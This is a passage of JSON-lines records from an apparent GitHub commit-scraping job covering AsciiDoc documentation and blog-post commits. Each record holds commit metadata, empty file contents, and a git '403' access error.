<f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"resume.adoc","new_file":"resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e11dfa673d542ed7e5018f4ea0ed1feccc0998c","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0897c5b2f5d36a49e063d2664171979084adb808","subject":"Document data import and processing","message":"Document data import and processing\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/data-import-and-processing.adoc","new_file":"docs\/data-import-and-processing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf17a621b646e8de7cc4025f0411e270242e27cb","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b15497b90e249cbb084f053f7264e1356d4a378e","subject":"Update 2016-04-12-Can-I-find-Your-internet-Shadow.adoc","message":"Update 2016-04-12-Can-I-find-Your-internet-Shadow.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Can-I-find-Your-internet-Shadow.adoc","new_file":"_posts\/2016-04-12-Can-I-find-Your-internet-Shadow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a407b9fe98b212ad9d77e98a745bdba5a9747e7","subject":"Update 2018-03-19-google-cloud-computing-deploy.adoc","message":"Update 2018-03-19-google-cloud-computing-deploy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_file":"_posts\/2018-03-19-google-cloud-computing-deploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c36a9fe903a4705012d1205206401bf9101803d4","subject":"[docs] Add basic advice on setting block cache size","message":"[docs] Add basic advice on setting block cache size\n\nThis adds a short section to the troubleshooting guide about improving\nthe performance of the block cache. It's fuzzy since the\neffectiveness of the cache and the efficacy of enlarging it are so\nworkload dependent (e.g. consider a workload doing full table scans vs.\none mostly re-scanning a small range checking for updates), but I tried\nto provide a starting point for users to evaluate their cache size since\nwe've totally lacked any advice on that up to this point.\n\nI also added information about the change due to release in 1.8 that\nservers won't start when the block cache capacity is set too large\nrelative to the memory limit.\n\nChange-Id: Idc7411c38b6fcc8694509ec89c32e2fe74e6c0db\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11420\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca40c675ffd812f571ad759eabb8d2b7ded55ee3","subject":"Update 2016-03-18-Blog-Title.adoc","message":"Update 2016-03-18-Blog-Title.adoc","repos":"thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io,thockenb\/thockenb.github.io","old_file":"_posts\/2016-03-18-Blog-Title.adoc","new_file":"_posts\/2016-03-18-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thockenb\/thockenb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec7d61a671a3e4ddcb1b15ab193eb4d25a237f8","subject":"Update 2018-10-18-Deck-Setup.adoc","message":"Update 2018-10-18-Deck-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-10-18-Deck-Setup.adoc","new_file":"_posts\/2018-10-18-Deck-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8484a82afc38e152ac6ba8560be95c386ea58228","subject":" doc update","message":" doc update\n","repos":"CNRS-DSI-Dev\/user_servervars2,CNRS-DSI-Dev\/user_servervars2","old_file":"doc\/doc.adoc","new_file":"doc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CNRS-DSI-Dev\/user_servervars2.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bfc39e3c60f068f0aa6bb2790304da04598344ce","subject":"Update 2016-03-19-My-title.adoc","message":"Update 
2016-03-19-My-title.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2016-03-19-My-title.adoc","new_file":"_posts\/2016-03-19-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4101748967a26fa95766141533de9115dafe9327","subject":"Update 2015-09-25-Second-post.adoc","message":"Update 2015-09-25-Second-post.adoc","repos":"spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress,spe\/spe.github.io.hubpress","old_file":"_posts\/2015-09-25-Second-post.adoc","new_file":"_posts\/2015-09-25-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spe\/spe.github.io.hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de385a43cc21117a1601c78749416265f9c23522","subject":"Update 2016-11-30-golang-http.adoc","message":"Update 2016-11-30-golang-http.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-11-30-golang-http.adoc","new_file":"_posts\/2016-11-30-golang-http.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e1217871aae63a68b561efd4bdd50611b7c45f1","subject":"Update 2017-04-03-Engineering.adoc","message":"Update 2017-04-03-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-Engineering.adoc","new_file":"_posts\/2017-04-03-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80facf6a80786921c570fa160fa007392ac59dd4","subject":"Update 2015-12-23-Hello-world.adoc","message":"Update 2015-12-23-Hello-world.adoc","repos":"RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io,RWOverdijk\/rwoverdijk.github.io","old_file":"_posts\/2015-12-23-Hello-world.adoc","new_file":"_posts\/2015-12-23-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RWOverdijk\/rwoverdijk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac45dd8e4f2cd8229cf44fef66557bd62052057","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ff79867959b88a98aa719ff62cf98dbe023d0c","subject":"add deref","message":"add 
deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/07\/30\/deref.adoc","new_file":"content\/news\/2022\/07\/30\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d6af0aa87083f0d28c470ee1c02db7544d318283","subject":"Added recipe for enabling disabling users","message":"Added recipe for enabling disabling users\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"02_working_with_users\/enabling_disabling_users.asciidoc","new_file":"02_working_with_users\/enabling_disabling_users.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a88dc95db9fa196c591d19236464089666dad2e","subject":"Renamed '_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc' to '_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc'","message":"Renamed '_posts\/2019-01-31-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc' to '_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc'","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_file":"_posts\/2019-02-22-Getting-Hip-with-J-Hpster-in-the-Java-Aktuell-Magazine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f3cb2e67569d39879a37868cf6a4fcc6f600f1c","subject":"minor update","message":"minor update\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_vm_manual.asciidoc","new_file":"trex_vm_manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f11a255716190184f8eaeef1888fd5b82773aa66","subject":"doc: release-guide: add LTS details","message":"doc: release-guide: add LTS details\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"ravineet-singh\/odp,ravineet-singh\/odp,dkrot\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,erachmi\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,nmorey\/odp,ravineet-singh\/odp","old_file":"doc\/process-guide\/release-guide.adoc","new_file":"doc\/process-guide\/release-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 
403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d47ba43900399a4910f7bb45f11a37899f3875b5","subject":"Added Route Policy adoc","message":"Added Route Policy adoc\n","repos":"onders86\/camel,adessaigne\/camel,cunningt\/camel,nicolaferraro\/camel,alvinkwekel\/camel,CodeSmell\/camel,nikhilvibhav\/camel,Fabryprog\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,christophd\/camel,tdiesler\/camel,Fabryprog\/camel,davidkarlsen\/camel,gnodet\/camel,kevinearls\/camel,zregvart\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,ullgren\/camel,onders86\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,adessaigne\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,cunningt\/camel,pax95\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,apache\/camel,kevinearls\/camel,objectiser\/camel,zregvart\/camel,Fabryprog\/camel,gnodet\/camel,adessaigne\/camel,alvinkwekel\/camel,Fabryprog\/camel,kevinearls\/camel,pax95\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,kevinearls\/camel,ullgren\/camel,objectiser\/camel,DariusX\/camel,pmoerenhout\/camel,gnodet\/camel,punkhorn\/camel-upstream,ullgren\/camel,punkhorn\/camel-upstream,ullgren\/camel,alvinkwekel\/camel,pmoerenhout\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,mcollovati\/camel,davidkarlsen\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,CodeSmell\/camel,objectiser\/camel,apache\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,apache\/camel,kevinearls\/camel,pmoerenhout\/camel,DariusX\/camel,objectiser\/camel,onders86\/camel,apache\/camel,mcollovati\/camel,kevinearls\/camel,tadayosi\/camel,onders86\/camel,gnodet\/camel","old_file":"docs\/user-manual\/en\/routepolicy.adoc","new_file":"docs\/user-manual\/en\/routepolicy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b29c1cc70bb25be87c5b1deb326e05691a637616","subject":"Update 2016-03-22-Micro-services-for-performance.adoc","message":"Update 2016-03-22-Micro-services-for-performance.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-22-Micro-services-for-performance.adoc","new_file":"_posts\/2016-03-22-Micro-services-for-performance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e855aa1cad03eaa5b068e773a199a702628ef2","subject":"Update 2016-04-10-m.adoc","message":"Update 
2016-04-10-m.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-m.adoc","new_file":"_posts\/2016-04-10-m.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecd6e618a0f7975812502a6cab9196676284b264","subject":"added howto guide on how to make the tracking environment. changed the analytics web report to fetch last 15 days of regression. added rule to ws_main to build the howto guide","message":"added howto guide on how to make the tracking environment. changed the analytics web report to fetch last 15 days of regression. added rule to ws_main to build the howto guide\n\nSigned-off-by: itraviv <d9922b8887db131d20f65fdcbad18ce7f1ad9059@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex-analytics-howto.asciidoc","new_file":"doc\/trex-analytics-howto.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"004b0d355ff5cf42cf000495525e81f07c8e8293","subject":"Update 2015-03-04-Game-design.adoc","message":"Update 2015-03-04-Game-design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2015-03-04-Game-design.adoc","new_file":"_posts\/2015-03-04-Game-design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4bb433421601b04d1d759c0ec718705bb6940e9","subject":"Update 2015-08-16-hello-world.adoc","message":"Update 2015-08-16-hello-world.adoc","repos":"gsera\/gsera.github.io,gsera\/gsera.github.io,gsera\/gsera.github.io","old_file":"_posts\/2015-08-16-hello-world.adoc","new_file":"_posts\/2015-08-16-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsera\/gsera.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71a9fd498dcaa5f53204e406f179f28882c56e55","subject":"Update 2016-01-25-Hello-World.adoc","message":"Update 2016-01-25-Hello-World.adoc","repos":"hyha600\/hyha600.github.io,hyha600\/hyha600.github.io,hyha600\/hyha600.github.io","old_file":"_posts\/2016-01-25-Hello-World.adoc","new_file":"_posts\/2016-01-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hyha600\/hyha600.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2738199e9d8b198cd5b4cf29a662632070141a","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 
2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f776b44d726d6ff03ff6b9eef3d9a0f796fe562a","subject":"lab 4 v3","message":"lab 4 v3\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-04\/04-tech-lab-v3.adoc","new_file":"Lab-04\/04-tech-lab-v3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"520fa6d33b7ef546c317dc98c5d098e00a4d3af8","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed66bbb4ee27dd59f51151712610f82cd4853a3","subject":"Update 2016-11-24-G-A-S.adoc","message":"Update 2016-11-24-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-24-G-A-S.adoc","new_file":"_posts\/2016-11-24-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9958f5f8490d94dd9b440b0fe08a74e022e5ab4","subject":"Update 2018-10-01-D3js1.adoc","message":"Update 2018-10-01-D3js1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-01-D3js1.adoc","new_file":"_posts\/2018-10-01-D3js1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efe7a68bfefd3fd78bb6bff16d7e18dc67bc6ad5","subject":"y2b create post Testing My New Superhuman Legs","message":"y2b create post Testing My New Superhuman Legs","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-19-Testing-My-New-Superhuman-Legs.adoc","new_file":"_posts\/2017-01-19-Testing-My-New-Superhuman-Legs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"316f22a1220688d9595f7cba483c717a09beae34","subject":"Update 
2016-02-16-Wordpress-Needs-To-Die.adoc","message":"Update 2016-02-16-Wordpress-Needs-To-Die.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_file":"_posts\/2016-02-16-Wordpress-Needs-To-Die.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"474136ec0c13e9cc3a8df36bc20c7b065b34f4e4","subject":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Publish 2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"2015-5-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2472c06aedcac19a777913436e4310896870d743","subject":"Deleted 2016-12-2-3-Dpen.adoc","message":"Deleted 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-3-Dpen.adoc","new_file":"2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ef83dd443a05e9122681950399edaa58a38d466","subject":"Updated run_dev instructions.","message":"Updated run_dev instructions.\n\nAlso, removed the deprecated --package_manager option in install_development.sh\n","repos":"jtk54\/spinnaker,Roshan2017\/spinnaker,stitchfix\/spinnaker,spinnaker\/spinnaker,spinnaker\/spinnaker,ewiseblatt\/spinnaker,duftler\/spinnaker,duftler\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,duftler\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,tgracchus\/spinnaker,tgracchus\/spinnaker,skim1420\/spinnaker,duftler\/spinnaker,jtk54\/spinnaker,spinnaker\/spinnaker,stitchfix\/spinnaker,ewiseblatt\/spinnaker,imosquera\/spinnaker,jtk54\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,Roshan2017\/spinnaker,skim1420\/spinnaker,tgracchus\/spinnaker,ewiseblatt\/spinnaker,stitchfix\/spinnaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"166ecf4d8de7f6a98c3e66adb9158d4286ebb75e","subject":"add badges","message":"add badges\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d638b497faef8c2cdcb492ff43a5a0afcea880f3","subject":"Issue 377 (#386)","message":"Issue 377 (#386)\n\n* Fix #377\r\n\r\nadd systemProperties.adoc\r\n\r\n* Fix #377\r\n\r\nedit systemProperties.adoc\r\n\r\n* Fix #377\r\n\r\nedit getBoolean\r\n\r\n* Fix #377 - tweak getBoolean","repos":"OpenHFT\/Chronicle-Bytes","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Bytes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4de4072dc824866000b5686f386934644185dd2e","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45999474d3df9051f7d056937d28d8356b24531e","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 